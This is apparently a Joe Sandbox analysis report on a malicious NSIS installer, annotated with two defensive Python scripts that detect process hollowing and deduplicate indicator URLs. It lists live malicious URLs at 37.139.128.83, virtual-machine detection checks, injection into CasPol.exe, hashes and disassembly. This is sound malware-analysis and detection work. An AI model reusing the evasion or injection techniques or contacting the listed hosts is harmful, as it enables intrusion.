Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process information set: NOOPENFILEERRORBOX (4 occurrences)
Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Users\user\Desktop\download.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory strings: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE3, \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXELE, C:\Program Files\Qemu-ga\qemu-ga.exe3, \??\C:\Program Files\Qemu-ga\qemu-ga.exele
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 928 | Thread sleep time: -300000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\download.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004026FE FindFirstFileA
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00406280 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\download.exe | API call chain: ExitProcess graph end node (2 occurrences)
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\download.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp and CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory strings: Hyper-V Guest Shutdown Service, Hyper-V Remote Desktop Virtualization Service, Hyper-V Volume Shadow Copy Requestor, Hyper-V PowerShell Direct Service, Hyper-V Time Synchronization Service, Hyper-V Data Exchange Service, Hyper-V Heartbeat Service, Hyper-V Guest Service Interface
Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmp | Binary or memory strings: vmicshutdown, vmicvss, vmicheartbeat
Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp and CasPol.exe, 00000004.00000002.5897618619.0000000003F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_00403B48 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongA,SendMessageA,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageA,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow
Note: the qemu-ga / qga file probes and the Hyper-V service names are checks for a virtualised host, and both download.exe and the injected CasPol.exe run them. This analysis ran on a native physical machine (see the analysis metadata below), so those artefacts were absent and the checks did not stop the sample: it went on to inject into CasPol.exe and to reach 37.139.128.83. Expect the same sample to stall or exit early on a hypervisor-based sandbox where these artefacts exist.

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\download.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 630000
Source: C:\Users\user\Desktop\download.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe, command line: C:\Users\user\Desktop\download.exe
Source: C:\Users\user\Desktop\download.exe | Code function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
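The chain above (CasPol.exe created by download.exe with download.exe's own path as its command line, then a write into CasPol.exe at 0x630000) is the process-hollowing shape that endpoint telemetry should catch before any payload runs. The following script is an added example, not Joe Sandbox code: it replays those events from a constructed list and flags a child whose command line does not name its own image and that subsequently receives a cross-process memory write from its parent. The event format is hypothetical (a minimal dict per event); the fields used are ones any EDR or Sysmon pipeline carries.

```python
import ntpath

# Constructed event stream reproducing the process tree and the memory write
# recorded in this report (PIDs, paths and order as listed).
EVENTS = [
    {"type": "process_create", "pid": 8540, "ppid": 0,
     "image": r"C:\Users\user\Desktop\download.exe",
     "cmdline": r"C:\Users\user\Desktop\download.exe"},
    {"type": "process_create", "pid": 924, "ppid": 8540,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe",
     "cmdline": r"C:\Users\user\Desktop\download.exe"},
    {"type": "memory_write", "source_pid": 8540, "target_pid": 924,
     "base": 0x630000},
    {"type": "process_create", "pid": 4728, "ppid": 924,
     "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]


def first_token(cmdline):
    """Return argv[0] the way CreateProcess reads it: a double-quoted path,
    or everything up to the first space."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def cmdline_mismatch(proc):
    """True when the command line claims a different executable than the one
    actually mapped as the process image (case-insensitive basename compare)."""
    claimed = ntpath.basename(first_token(proc["cmdline"])).lower()
    actual = ntpath.basename(proc["image"]).lower()
    return claimed != actual


def hollowing_chains(events):
    """Correlate a mismatching child with a later memory write from its parent.

    Returns one alert dict per child that (a) was created with a command line
    naming some other program and (b) then had its memory written by the
    process that created it. Benign children such as conhost.exe pass.
    """
    procs = {}
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            procs[ev["pid"]] = ev
        elif ev["type"] == "memory_write":
            child = procs.get(ev["target_pid"])
            if child and child["ppid"] == ev["source_pid"] and cmdline_mismatch(child):
                alerts.append({"pid": child["pid"], "parent_pid": ev["source_pid"],
                               "image": child["image"],
                               "claimed": first_token(child["cmdline"]),
                               "write_base": ev["base"]})
    return alerts


if __name__ == "__main__":
    for a in hollowing_chains(EVENTS):
        print(f"PID {a['pid']} image {a['image']} claims to be {a['claimed']}; "
              f"parent {a['parent_pid']} wrote at {a['write_base']:#x}")
```

The command-line mismatch alone is already a strong signal for a process created from a .NET framework utility such as CasPol.exe; requiring the subsequent write from the parent keeps the rule quiet on legitimate launchers that pass an odd argv[0].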
MITRE ATT&CK matrix by tactic (the leading numbers are the signature-count badges as rendered in the report; entries without a number are the matrix template and were not matched):
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: 1 Native API, Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd
Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: 1 Access Token Manipulation, 111 Process Injection, 1 DLL Side-Loading, Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: 1 Masquerading, 11 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 111 Process Injection, 1 Obfuscated Files or Information, 1 DLL Side-Loading
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: 21 Security Software Discovery, 11 Virtualization/Sandbox Evasion, 3 File and Directory Discovery, 3 System Information Discovery, Remote System Discovery, System Owner/User Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: 1 Archive Collected Data, 1 Clipboard Data, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: 1 Encrypted Channel, 3 Ingress Tool Transfer, 2 Non-Application Layer Protocol, 12 Application Layer Protocol, Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features
Impact: 1 System Shutdown/Reboot, Device Lockout, Delete Device Data
No Antivirus matches
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dll | 0% | ReversingLabs |
Source | Detection | Scanner | Label
2.2.download.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
2.0.download.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1223491
No Antivirus matches
Source | Detection | Scanner | Label
http://37.139.128.83/2-2 | 100% | Avira URL Cloud | malware
http://37.139.128.83/2k | 100% | Avira URL Cloud | malware
http://37.139.128.83/2 | 100% | Avira URL Cloud | malware
http://37.139.128.83/2Data | 100% | Avira URL Cloud | malware
http://37.139.128.83/2M | 100% | Avira URL Cloud | malware
http://37.139.128.83/2W7 | 100% | Avira URL Cloud | malware
http://37.139.128.83/2R2 | 100% | Avira URL Cloud | malware
http://37.139.128.83/2e | 100% | Avira URL Cloud | malware
http://37.139.128.83/l | 100% | Avira URL Cloud | malware
http://www.avast.com0/ | 0% | Avira URL Cloud | safe
http://37.139.128.83/2gsLMEM8 | 100% | Avira URL Cloud | malware
http://37.139.128.83/2$2 | 100% | Avira URL Cloud | malware
http://37.139.128.83/262hk | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://37.139.128.83/2 | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://37.139.128.83/2-2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_Error | download.exe | false | (none) | high
http://37.139.128.83/2M | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2Data | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2k | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2R2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2W7 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2e | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.avast.com0/ | lang-1032.dll.2.dr | false | Avira URL Cloud: safe | unknown
http://37.139.128.83/l | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://nsis.sf.net/NSIS_ErrorError | download.exe | false | (none) | high
http://37.139.128.83/2gsLMEM8 | CasPol.exe, 00000004.00000002.5897618619.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/2$2 | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://37.139.128.83/262hk | CasPol.exe, 00000004.00000002.5897618619.0000000003F0D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
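All of the 37.139.128.83 entries above except /2 and /l are overruns: memory-string extraction kept whatever bytes followed the terminating URL in the dump (2-2, 2k, 2Data, ...), and each variant then received its own Avira verdict. The script below is an added example and not part of the report: it collapses such variants onto the shortest URL that is a prefix of them, so that what goes into a blocklist is the real IOC (http://37.139.128.83/2, which the contacted-URL table confirms) rather than a dozen near-duplicates. A bare host root is never allowed to absorb longer URLs, so a stray http://host/ string cannot swallow unrelated paths. The URL list is copied from this report as constructed input.

```python
from urllib.parse import urlsplit

# URL strings as listed in this report (memory strings from CasPol.exe and
# download.exe plus one from the dropped lang-1032.dll), used as constructed input.
RAW_URLS = [
    "http://37.139.128.83/2-2", "http://37.139.128.83/2k", "http://37.139.128.83/2",
    "http://37.139.128.83/2Data", "http://37.139.128.83/2M", "http://37.139.128.83/2W7",
    "http://37.139.128.83/2R2", "http://37.139.128.83/2e", "http://37.139.128.83/l",
    "http://www.avast.com0/", "http://37.139.128.83/2gsLMEM8", "http://37.139.128.83/2$2",
    "http://37.139.128.83/262hk", "http://nsis.sf.net/NSIS_Error",
    "http://nsis.sf.net/NSIS_ErrorError",
]


def absorbs(candidate):
    """A candidate may absorb longer strings only if it has a real path.

    Without this rule a bare root such as http://host/ would swallow every
    URL on that host and hide distinct paths from the analyst.
    """
    return urlsplit(candidate).path not in ("", "/")


def canonical_iocs(urls):
    """Collapse memory-string URL variants onto the shortest URL that is a prefix.

    URLs are visited shortest first, so a canonical is always registered before
    any of its overrun variants. Returns {canonical_url: sorted variants}.
    """
    canon = {}
    for url in sorted(set(urls), key=lambda u: (len(u), u)):
        parent = next((c for c in canon if url.startswith(c) and absorbs(c)), None)
        if parent is None:
            canon[url] = []
        else:
            canon[parent].append(url)
    return {c: sorted(v) for c, v in canon.items()}


def blocklist(urls, confirmed=()):
    """Flatten to (url, variant_count, confirmed_contact) for reporting.

    `confirmed` holds URLs the sandbox actually saw on the wire; here that is
    the single entry of the contacted-URL table above.
    """
    canon = canonical_iocs(urls)
    return sorted((u, len(v), u in set(confirmed)) for u, v in canon.items())


if __name__ == "__main__":
    for url, n_variants, seen in blocklist(RAW_URLS, confirmed=["http://37.139.128.83/2"]):
        flag = "contacted" if seen else "memory only"
        print(f"{url}  ({n_variants} overrun variants, {flag})")
```

The NSIS URLs collapse the same way (NSIS_ErrorError onto NSIS_Error) and stay out of the blocklist because they are installer boilerplate, not infrastructure; the avast.com string comes from the dropped DLL and should be read as a string inside that file, not as contact.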
IP | Domain | Country | ASN | ASN Name | Malicious
37.139.128.83 | unknown | Germany | 10753 | LVLT-10753US | false
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830512
              Start date and time:2023-03-20 13:11:48 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 17m 48s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
              Number of analysed new started processes analysed:18
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:download.exe
              Detection:MAL
              Classification:mal76.troj.evad.winEXE@4/5@0/1
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 21.3% (good quality ratio 20.9%)
              • Quality average: 88.9%
              • Quality standard deviation: 21.4%
              HCA Information:
              • Successful, ratio: 78%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps longer than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, fs.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com
              • Execution Graph export aborted for target CasPol.exe, PID 924 because there are no executed functions
              • Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Process:C:\Users\user\Desktop\download.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):11776
              Entropy (8bit):5.825582780706362
              Encrypted:false
              SSDEEP:192:yPtkiQJr7V9r3Ftr87NfwXQ6whlgi62V7i77blbTc4DI:N7Vxr8IgLgi3sVc4
              MD5:FBE295E5A1ACFBD0A6271898F885FE6A
              SHA1:D6D205922E61635472EFB13C2BB92C9AC6CB96DA
              SHA-256:A1390A78533C47E55CC364E97AF431117126D04A7FAED49390210EA3E89DD0E1
              SHA-512:2CB596971E504EAF1CE8E3F09719EBFB3F6234CEA5CA7B0D33EC7500832FF4B97EC2BBE15A1FBF7E6A5B02C59DB824092B9562CD8991F4D027FEAB6FD3177B06
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:moderate, very likely benign file
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....~.\...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\download.exe
              File Type:data
              Category:dropped
              Size (bytes):310762
              Entropy (8bit):7.153872132508062
              Encrypted:false
              SSDEEP:6144:gjumg/DuSWsGx6RZLOMqkcjpwn2+3VJInGwhTFLI:gjumgbhWsGWZ+kcj2n2OJInJhTS
              MD5:A1C8FEE704DB305175D7A96481B66C73
              SHA1:F26BE75182187BB5AA73C170605CF171D62DC023
              SHA-256:004CC2CA7789AB32D71678F5174DFC0F8EF1BA70A457929037E8CE0E4FD625C2
              SHA-512:4F5865B975DDD54A7770D89A28ADD620C5A675225F8F7974E68A6173B33C6FCA853D98AD1E2B054147B2ACD6C810BF90A252C30034973AB08B9CBACD69E6B965
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\download.exe
              File Type:data
              Category:dropped
              Size (bytes):142071
              Entropy (8bit):7.998708530523099
              Encrypted:true
              SSDEEP:3072:NZcIfJJvbMxWCmEblH1ZC0+UM53+9I1dPg4kh89+08iFRbleoK:5DMxW4fz1e3+9Sg9Z1iFRleoK
              MD5:2CB77C7D9E16C0EF410FA8BC1CC1185A
              SHA1:0FCBA04A0B4B4563D62A073080E173590BEEBEDD
              SHA-256:A0BFB53FAD74C41F699F171902C1D6A0AC33A81963697A3F674234B2FF36203A
              SHA-512:33FDB3488F9BF085D7CDA649984BAE271194ECB64B569B5BDB1D09DE48C5D5407D75CDC2EA1A59E8E199F821CE4DA5F101D0A7CAA44E544E78C8D8507B6BC751
              Malicious:false
              Process:C:\Users\user\Desktop\download.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):178696
              Entropy (8bit):4.4006904456537335
              Encrypted:false
              SSDEEP:3072:A8kCKqgt37ZJvMQSOnMIomX6YZVG5dWCR7+nyadqLEzBUyQj2UGBOyj:CvM7yj
              MD5:8AD3A9D8C3DDA9854C13D213D00A8DB8
              SHA1:74283E98F0426DFA7854CEEF9BA43217F39DAB36
              SHA-256:DA07C1D13136E3BAABB9D0598AF99BCB48898BF5DBCA0F0477602BEA957198E9
              SHA-512:C30CA6FA4A62A6383C15AB8B95CD88714AF5C3A63F7FC9C8F767FED18E295B885B765B630831F456D16DB5DA7AA037CA931FCB3F412AB95A8D5E46B1B44497CA
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.@...R.@.P...R.Rich..R.................PE..L....\)b...........!......................................................................@.......................................... ..`................ ...........................................................................................rdata..p...........................@..@.rsrc...`.... ......................@..@.....\)b........T........................rdata......T....rdata$zzzdbg.... ... ...rsrc$01.....@...s...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\download.exe
              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):291
              Entropy (8bit):6.913400639640828
              Encrypted:false
              SSDEEP:6:6v/lhPysSFX/Fd8cy2TY3594VW6yTpm/v4pRw+jGbcnFbp:6v/7yFvn8cGJkv3twD
              MD5:303E1921A67BAE379BC4B36352F391AA
              SHA1:AB361F32C8F1811EC7DB6EB96DAD417753323DB4
              SHA-256:1FC1141E644151384931853426BD36B5293BCAFE380189515850B9CC8FF158D7
              SHA-512:0A355819B8EB530A30710D536CCF6F5AACA7E9050C7CA9F591E31DC8BCBCEFC83EC9EA5B1E3B9356D64A66B42D04A0DD504A97B7AFC6CA35E7CED23A82A74C93
              Malicious:false
              Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...1N.Q........V6R.H....w...A.`.5v..`mK.ZH.Z8.l`.l._2y......k..8....a.il...8.~.I@.Y.Le.'<G.....a....h...W@.q.3..n..(jb.P.`......X....1..1...!f./..h.~..!..q....3...x.g.7u.{St3......w./Q..g.....*a.]..T..T.~.?.+2.pM......IEND.B`.
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.546765550553085
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:download.exe
              File size:680560 bytes
              MD5:064fa36da0c2ca360b0906cc5bfe67c6
              SHA1:a6623c33cbd86bdaee063f897bea1692621494e5
              SHA256:6974c5051372213d0e90147660c4b21bfff238e20c6449acb19f1901bf4729c8
              SHA512:39845a084b66442a1eb114621df67fe6db88e758b4564b79c01eff6a1935dcaba4149f0d3c68e243258b7da5f3ce197a904e226f561a0dfc1377ff22419a6026
              SSDEEP:12288:Z4oLK6+zAX00AF1pOSJe3xbIvli343lKZwIcBRPgYxFz18+t9Z1kU:6PQ00AF1pOSJeBUyqKKrf318U9Z1z
              TLSH:F2E4F15A2B7AC815D065E9F85AE3C50D5C749E14183CABD25BB1283EEBFC2527B0F047
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L......\.................b....9....
              Icon Hash:c4ccc6e6e4f6f640
              Entrypoint:0x4031e9
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x5C157F01 [Sat Dec 15 22:24:01 2018 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:3abe302b6d9a1256e6a915429af4ffd2
              Signature Valid:false
              Signature Issuer:CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
              Error Number:-2146762487
              Not Before:24/01/2023 23:36:10
              Not After:23/01/2026 23:36:10
              Subject Chain:
              • CN=barket, OU="Biselg Halo Uvitinic ", E=Strammende@Kummerfuld.Kur, O=barket, L=Middleton, S=Tennessee, C=US
              Version:3
              Thumbprint MD5:F856691DCF4BB6A788E55B70FE388011
              Thumbprint SHA-1:0C5E3286DBBB50FA720930F437DDBC472FF1EFDF
              Thumbprint SHA-256:7BCC618A115B3494BA1A7F1A5EDFACF31559C85478D2F90A7916E2A476BCF411
              Serial:807C3D2B116DDE7C
              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080A0h]
              call dword ptr [0040809Ch]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [007A2F4Ch], eax
              je 00007FBDE865E5C3h
              push ebx
              call 00007FBDE866169Ah
              cmp eax, ebx
              je 00007FBDE865E5B9h
              push 00000C00h
              call eax
              mov esi, 00408298h
              push esi
              call 00007FBDE8661616h
              push esi
              call dword ptr [00408098h]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007FBDE865E59Dh
              push 0000000Ah
              call 00007FBDE866166Eh
              push 00000008h
              call 00007FBDE8661667h
              push 00000006h
              mov dword ptr [007A2F44h], eax
              call 00007FBDE866165Bh
              cmp eax, ebx
              je 00007FBDE865E5C1h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007FBDE865E5B9h
              or byte ptr [007A2F4Fh], 00000040h
              push ebp
              call dword ptr [00408044h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [007A3018h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0079E500h
              call dword ptr [00408178h]
              push 0040A188h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8430 | 0xa0 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c7000 | 0x37c28 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa4d40 | 0x1530 | .data
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x298 | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x6068 | 0x6200 | False | 0.671875 | data | 6.450713900012796 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
